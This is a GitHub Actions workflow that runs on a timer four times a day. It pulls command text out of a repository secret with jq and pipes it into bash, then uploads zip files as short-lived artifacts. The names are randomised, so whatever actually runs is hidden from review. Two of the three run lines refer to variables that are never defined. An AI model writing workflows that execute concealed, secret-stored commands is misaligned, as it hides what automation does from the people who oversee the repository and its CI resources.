name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '19 2,8,14,20 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Launch
        env:
          ygyc914: ${{ secrets.ygyc914 }}
        run: |
          printf '%s' "$ygyc914" | jq -r .cbycm19 | /bin/bash
          printf '%s' "$lqd1" | jq -r .rgooc3 | /bin/bash
          printf '%s' "$nrfwp8643" | jq -r .mxhgv7 | /bin/bash

      - name: Persist output
        uses: actions/upload-artifact@v4
        with:
          name: udqVeCyL
          path: "*.zip"
          retention-days: 1
